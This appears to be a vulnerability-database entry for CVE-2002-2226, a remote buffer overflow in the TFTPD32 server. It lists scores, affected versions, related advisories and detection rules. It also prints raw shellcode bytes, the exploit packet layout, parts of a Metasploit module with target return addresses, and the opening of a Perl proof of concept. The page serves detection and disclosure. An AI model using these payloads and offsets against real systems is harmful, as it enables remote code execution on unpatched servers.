CVE-2002-2226
Published: 2002-12-31
Buffer overflow in tftpd of TFTP32 2.21 and earlier allows remote attackers to execute arbitrary code via a long filename argument.
Priority: P3 | 51 | high | 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 63.48% (99.1th percentile)
Affected (12 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| philippe_jounin | tftpd32 | <= 2.74 | — |
| tftpd32 | tftpd32 | <= 2.21 | — |
The remaining 10 philippe_jounin/tftpd32 entries carry no version range or fix version.
Detection & IOCs (extracted from sources)

Indicators:
- bytes: \x00\x01 (TFTP RRQ opcode) followed by long filename buffer
- bytes (shellcode): \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB\xFD\xE8\xD4\xFF\xFF\xFF
- bytes (Metasploit packet layout): \x00\x01 + rand_text_english(120) + "." + rand_text_english(135) + [ret].pack('V') + payload + \x00

Detection:
- Detect oversized TFTP RRQ (opcode 0x0001) or WRQ (opcode 0x0002) packets on UDP/69 where the filename field exceeds normal bounds (~255 bytes); the exploit sends 120+ bytes before a '.' separator followed by 135+ bytes.
- Alert on TFTP packets to UDP port 69 containing the shellcode byte sequence starting with \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2.
- The exploit payload's only BadChars value is \x00; any non-null byte sequence of 250+ bytes following a TFTP RRQ opcode on UDP/69 towards a TFTPD32 host is suspicious.
- The Metasploit module uses EXITFUNC=process and a StackAdjustment of -3500, which is characteristic of this specific exploit's stack pivot behaviour and can be used as a behavioural detection signal.
- Monitor for TFTP RRQ/WRQ packets on UDP/69 whose total length is anomalously large (well beyond the 512-byte TFTP block size or a normal filename length), indicating a buffer overflow attempt against TFTPD32.

Notes:
- The PoC exploit hardcodes a target IP and uses a fixed offset (116 'A's + '.' + 140 'A's for EIP), so the exact buffer layout differs from the Metasploit module offsets (120 + '.' + 135). Detections based on exact byte offsets should account for both variants.
- The CVE affects TFTPD32 version 2.21 and earlier per NVD, but the Exploit-DB title references version 2.50, suggesting the vulnerability or a variant may affect a broader version range than originally documented.
- The return addresses in the Metasploit module are OS/SP-specific hardcoded values; exploitation will only succeed against the exact listed Windows targets (NT4 SP6a, 2000 SP4, XP SP0, XP SP1 English).
GHSA
GHSA-35x5-8hjg-m53r: tftpd in Philippe Jounin Tftpd32 2
ghsa_unreviewed · 2022-05-01 · CVSS 7.5 · CVE-2005-4882 [HIGH] · CWE-119
tftpd in Philippe Jounin Tftpd32 2.74 and earlier, as used in Wyse Simple Imager (WSI) and other products, allows remote attackers to cause a denial of service (daemon crash) via a long filename in a TFTP read (aka RRQ or get) request, a different vulnerability than CVE-2002-2226.
GHSA
GHSA-w2mh-pcg2-v2jv: Buffer overflow in tftpd of TFTP32 2
ghsa_unreviewed · 2022-04-30 · CVE-2002-2226 [HIGH] · CWE-119
Buffer overflow in tftpd of TFTP32 2.21 and earlier allows remote attackers to execute arbitrary code via a long filename argument.
No detection rules found.
Exploit-DB
TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2002-2226
TFTPD32 'TFTPD32 %q{
          This module exploits a stack buffer overflow in TFTPD32 version 2.21
          and prior. By sending a request for an overly long file name
          to the tftpd32 server, a remote attacker could overflow a buffer and
          execute arbitrary code on the system.
        },
      'Author'         => 'MC',
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          ['CVE', '2002-2226'],
          ['OSVDB', '45903'],
          ['BID', '6199'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 250,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows NT 4.0 SP6a English',  { 'Ret' => 0x77f9d463 } ],
          ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ],
          ['Windows XP Pro SP0 English',   { 'Ret' => 0x77dc0df0 } ],
          ['Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
        ],
      'P
Exploit-DB
TFTPD32 2.50 - 'Filename' Remote Buffer Overflow
exploitdb · 2002-11-19 · CVE-2002-2226
---
source: https://www.securityfocus.com/bid/6199/info
A buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input.
A remote attacker can exploit this vulnerability by supplying a long string as a name of the file to retrieve. This will trigger the buffer-overflow condition. Any malicious attacker-supplied code will be executed with the privileges of the Tftpd32 process.
#!/usr/bin/perl
#TFTP Server remote Buffer Overflow
use IO::Socket;
$host = "192.168.1.53";
$port = "69";
$data = "A";
#$buf .= "\x00\x02"; # WRQ (send) ---- choose one opcode
$buf .= "\x00\x01"; # RRQ (receive)
$buf .= "A";
$num = "116";
$buf .= $data x $num;
$buf .= ".";
$num = "140"; # EIP section
$buf .= $dat
Metasploit
TFTPD32 Long Filename Buffer Overflow
metasploit
This module exploits a stack buffer overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.
No writeups or analysis indexed.
References
- http://securityreason.com/securityalert/3160
- http://tftpd32.jounin.net/
- http://www.kb.cert.org/vuls/id/632633
- http://www.securiteam.com/windowsntfocus/6C00C2061A.html
- http://www.securityfocus.com/archive/1/300395
- http://www.securityfocus.com/bid/6199
- https://exchange.xforce.ibmcloud.com/vulnerabilities/10647